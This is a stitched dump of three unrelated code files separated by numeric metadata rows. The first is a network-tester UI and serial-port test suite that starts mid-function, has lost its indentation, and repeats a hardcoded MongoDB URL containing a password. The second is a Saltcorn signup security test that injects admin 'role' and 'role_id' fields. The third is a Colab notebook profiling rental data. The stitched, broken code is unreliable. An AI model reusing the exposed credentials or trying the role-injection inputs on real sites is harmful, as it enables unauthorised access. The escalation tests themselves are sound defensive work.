ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_6():
print "Method testmethod_6 in class testclass_4"
print "Method GW empty, DNS same subnet set, WWW hostname, same subnet, reachable in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudgreen.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'green'
def testmethod_7():
print "Method testmethod_7 in class testclass_4"
print "Method GW empty, DNS same subnet set, WWW hostname, same subnet, fw enable in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
firewall = Gateway()
firewall.set_firewall_enable()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
firewall1 = Gateway()
firewall1.set_firewall_disable()
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_8():
print "Method testmethod_8 in class testclass_4"
print "Method GW empty, DNS same subnet set, WWW hostname,same subnet, arp failed in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('c.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_9():
print "Method testmethod_9 in class testclass_4"
print "Method GW empty, DNS same subnet set, WWW hostname, diffirent subnet in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('192.168.1.200')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_10():
print "Method testmethod_10 in class testclass_4"
print "Method GW empty, DNS same subnet, DNS service down, WWW hostname in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
down_dns = DNS()
down_dns.set_dns_stop()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
up_dns = DNS()
up_dns.set_dns_start()
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_11():
print "Method testmethod_11 in class testclass_4"
print "Method GW empty, DNS different subnet, WWW hostname in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.1.100')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_12():
print "Method testmethod_12 in class testclass_4"
print "Method GW set, DNS empty, WWW hostname in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','192.168.2.200','0.0.0.0')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewaygreen.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tGREEN'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
GW_color = aa['routerColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
assert GW_color == u'green'
def testmethod_13():
print "Method testmethod_13 in class testclass_4"
print "Method GW set incorrect, WWW different subnet in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','192.168.2.210','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('www.baidu.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayred.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tRED'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
GW_color = aa['routerColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
assert GW_color == u'red'
| 38.603687 | 120 | 0.68891 | 4,616 | 33,508 | 4.795277 | 0.042678 | 0.006054 | 0.007454 | 0.023492 | 0.958618 | 0.95532 | 0.954732 | 0.953377 | 0.949492 | 0.947775 | 0 | 0.056917 | 0.173123 | 33,508 | 867 | 121 | 38.648212 | 0.741979 | 0.008147 | 0 | 0.907363 | 0 | 0.015439 | 0.258257 | 0.046184 | 0 | 0 | 0 | 0 | 0.15677 | 0 | null | null | 0 | 0.019002 | null | null | 0.190024 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f3d0f56f8b22a484098e32849e88c21c4f80007f | 5,481 | py | Python | infosec-scan/py-sectest/custom_login_signup_test.py | em3ndez/saltcorn | 1e0f6e6a049a36e501e5cd16fc42e14714f87c95 | [
"MIT"
] | 689 | 2020-05-23T10:33:50.000Z | 2022-03-31T23:10:50.000Z | infosec-scan/py-sectest/custom_login_signup_test.py | em3ndez/saltcorn | 1e0f6e6a049a36e501e5cd16fc42e14714f87c95 | [
"MIT"
] | 424 | 2020-08-10T17:24:08.000Z | 2022-03-25T11:52:10.000Z | infosec-scan/py-sectest/custom_login_signup_test.py | em3ndez/saltcorn | 1e0f6e6a049a36e501e5cd16fc42e14714f87c95 | [
"MIT"
] | 155 | 2020-06-03T05:44:35.000Z | 2022-03-29T00:46:05.000Z | from scsession import SaltcornSession
class Test:
def setup_class(self):
SaltcornSession.cli("reset-schema", "-f")
SaltcornSession.cli("install-pack", "-f", SaltcornSession.asset_path("custom_login_signup_pack.json"))
SaltcornSession.cli("set-cfg", "new_user_form","userinfo" )
SaltcornSession.cli("set-cfg", "login_form","login" )
SaltcornSession.cli("set-cfg", "signup_form","signup" )
SaltcornSession.cli("set-cfg", "user_settings_form","userinfo" )
self.sess = SaltcornSession(3001)
def teardown_class(self):
self.sess.close()
def cannot_access_admin(self):
self.sess.get('/table')
assert self.sess.status == 302
assert "Your tables" not in self.sess.content
def test_can_signup_custom(self):
self.sess.reset()
self.sess.get('/auth/signup')
assert "Sign up" in self.sess.content
assert ">username<" in self.sess.content
assert self.sess.status == 200
self.sess.postForm('/auth/signup',
{'email': 'thebestuser@mail.com',
'password': 'ty435y5OPtyj',
'passwordRepeat': 'ty435y5OPtyj',
'username': 'foobar',
'_csrf': self.sess.csrf()
})
assert '>age<' in self.sess.content
assert 'action="/auth/signup_final"' in self.sess.content #
self.sess.postForm('/auth/signup_final',
{'age': '34',
'email': 'thebestuser@mail.com',
'password': 'ty435y5OPtyj',
'passwordRepeat': 'ty435y5OPtyj',
'username': 'foobar',
'_csrf': self.sess.csrf()
})
assert self.sess.redirect_url == '/'
self.sess.follow_redirect()
assert '>Welcome' in self.sess.content
def test_cannot_become_admin_signup_custom(self):
self.sess.reset()
self.sess.get('/auth/signup')
assert "Sign up" in self.sess.content
assert ">username<" in self.sess.content
assert self.sess.status == 200
self.sess.postForm('/auth/signup',
{'email': 'thebestuse6r@mail.com',
'password': 'ty435y5OPtyj',
'passwordRepeat': 'ty435y5OPtyj',
'username': 'foobaz',
'role': 'admin',
'role_id': '1',
'_csrf': self.sess.csrf()
})
assert '>age<' in self.sess.content
assert 'action="/auth/signup_final"' in self.sess.content #
self.sess.postForm('/auth/signup_final',
{'age': '34',
'email': 'thebestuse6r@mail.com',
'password': 'ty435y5OPtyj',
'passwordRepeat': 'ty435y5OPtyj',
'username': 'foobaz',
'role': 'admin',
'role_id': '1',
'_csrf': self.sess.csrf()
})
assert self.sess.redirect_url == '/'
self.sess.follow_redirect()
assert '>Welcome' in self.sess.content
self.cannot_access_admin()
def test_cannot_become_admin_signup_custom1(self):
self.sess.reset()
self.sess.get('/auth/signup')
assert "Sign up" in self.sess.content
assert ">username<" in self.sess.content
assert self.sess.status == 200
self.sess.postForm('/auth/signup',
{'email': 'thebestuse7r@mail.com',
'password': 'ty435y5OPtyj',
'passwordRepeat': 'ty435y5OPtyj',
'username': 'foobap',
'role': '1',
'_csrf': self.sess.csrf()
})
assert '>age<' in self.sess.content
assert 'action="/auth/signup_final"' in self.sess.content #
self.sess.postForm('/auth/signup_final',
{'age': '34',
'email': 'thebestuse7r@mail.com',
'password': 'ty435y5OPtyj',
'passwordRepeat': 'ty435y5OPtyj',
'username': 'foobap',
'role': '1',
'_csrf': self.sess.csrf()
})
assert self.sess.redirect_url == '/'
self.sess.follow_redirect()
assert '>Welcome' in self.sess.content
self.cannot_access_admin()
def test_password_repeat(self):
self.sess.reset()
self.sess.get('/auth/signup')
assert "Sign up" in self.sess.content
assert ">username<" in self.sess.content
assert self.sess.status == 200
self.sess.postForm('/auth/signup',
{'email': 'thebestuser9@mail.com',
'password': 'ty435y5OPtyj',
'passwordRepeat': 'ty435w5OPtyj',
'username': 'berry',
'_csrf': self.sess.csrf()
})
assert self.sess.redirect_url == '/auth/signup'
self.sess.follow_redirect()
assert 'Passwords do not match' in self.sess.content
def test_password_repeat_missing(self):
self.sess.reset()
self.sess.get('/auth/signup')
assert "Sign up" in self.sess.content
assert ">username<" in self.sess.content
assert self.sess.status == 200
self.sess.postForm('/auth/signup',
{'email': 'thebestuser10@mail.com',
'password': 'ty435y5OPtyj',
'username': 'berr1y',
'_csrf': self.sess.csrf()
})
print(self.sess.content)
assert self.sess.redirect_url == '/auth/signup'
self.sess.follow_redirect()
assert 'Passwords do not match' in self.sess.content
| 38.0625 | 110 | 0.558475 | 569 | 5,481 | 5.27065 | 0.156415 | 0.181394 | 0.115038 | 0.124708 | 0.787596 | 0.773925 | 0.742914 | 0.742914 | 0.742914 | 0.737579 | 0 | 0.02622 | 0.297209 | 5,481 | 144 | 111 | 38.0625 | 0.752336 | 0 | 0 | 0.753731 | 0 | 0 | 0.253696 | 0.043256 | 0 | 0 | 0 | 0 | 0.246269 | 1 | 0.059701 | false | 0.141791 | 0.007463 | 0 | 0.074627 | 0.007463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
f3d21d6e2a9d99408278747f314312cb0cc93377 | 658,717 | py | Python | scripts-python/projeto_relatorio_analise_exploratoria.py | rosacarla/DIO-data-projects | 072c76d10bdb98515fa174020469431c82096c23 | [
"MIT"
] | 1 | 2022-03-29T04:16:09.000Z | 2022-03-29T04:16:09.000Z | scripts-python/projeto_relatorio_analise_exploratoria.py | rosacarla/DIO-data-projects | 072c76d10bdb98515fa174020469431c82096c23 | [
"MIT"
] | null | null | null | scripts-python/projeto_relatorio_analise_exploratoria.py | rosacarla/DIO-data-projects | 072c76d10bdb98515fa174020469431c82096c23 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Projeto_Relatorio_Analise_Exploratoria.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/13JeYhek8rkHLncTOMIv-FBeSauVj0lv3

________________________________________________________________________________
###Autora: Carla Edila Santos da Rosa Silveira
###Contato: rosa.carla@pucpr.edu.br
###Versão original: [Rodrigo Correa](https://www.linkedin.com/pulse/seu-primeiro-projeto-em-python-an%25C3%25A1lise-de-dados-com-pandas-correa/?trackingId=fgbWwU%2FLYynQJpW2zPh93w%3D%3D)
###Tecnologias: Google Drive e Colab, [Kaggle](https://www.kaggle.com/), [Pixabay](https://pixabay.com/pt/), [Github](https://github.com/), [biblioteca Pandas](https://pandas.pydata.org/), [Python](https://www.python.org/)
###Dataset: Houses to Rent (base de dados com 10 mil imóveis para locação no Brasil)
#Projeto: Relatório para Análise Exploratória de Dados
________________________________________________________________________________

######Imagem de <a href="https://pixabay.com/pt/users/geralt-9301/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=909710">Gerd Altmann</a> por <a href="https://pixabay.com/pt/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=909710">Pixabay</a>
________________________________________________________________________________
##Montagem do Drive
"""
from google.colab import drive #importa o drive pessoal do Google
drive.mount('/content/drive') #monta o drive no Colab
!ls '/content/drive/My Drive/Colab Notebooks' #mostra conteudo da pasta Colab Notebooks e a pasta Dados com o dataset
"""##Carregamento dos dados"""
import pandas as pd #download da biblioteca Pandas do Python
Dados = pd.read_csv('/content/drive/My Drive/Colab Notebooks/Data/houses_to_rent_v2.csv') #renomeada a base de dados
"""##Leitura inicial do dataset"""
Dados.info() #visao geral da estrutura de dados
Dados.head(12) #leitura das 12 primmeiras linhas do dataset
"""##Instalação do gerador de relatório de dados"""
! pip install https://github.com/pandas-profiling/pandas-profiling/archive/master.zip #instala gerador de relatorio Pandas Profiling (nao executar de novo!)
"""##Carregamento da biblioteca Profile Report"""
from pandas_profiling import ProfileReport #chamar a biblioteca (nao executar de novo!)
"""##Geração do Relatório para Análise Exploratória"""
profile = ProfileReport(Dados, title='Dados Alugueis Capitais', html={'style':{'full_width':True}}) #nomeia o relatorio, fixa formato em html e largura da tela
profile.to_notebook_iframe() #gera relatorio com visualizacao em html
""""""
profile.to_file("report_residencias.html") #gerado relatorio em html
"""##Armazenamento do relatorio no Drive"""
profile.to_file(output_file='/content/drive/My Drive/Colab Notebooks/Pandas Profiling Report_Residencias.html') #relatorio salvo no drive
"""##Versãão final do [Relatorio Dados Alugueis Capitais](https://docs.google.com/document/d/1r6GguJ1s5jJn5d1JXcid2IZ4G9z4Nj5pYVX2hgrTAIM/edit?usp=sharing).
_______________________________________________________________________________
###Autora: Carla Edila Santos da Rosa Silveira
###Contato: rosa.carla@pucpr.edu.br
###Desenvolvido em: 04/08/2021
________________________________________________________________________________
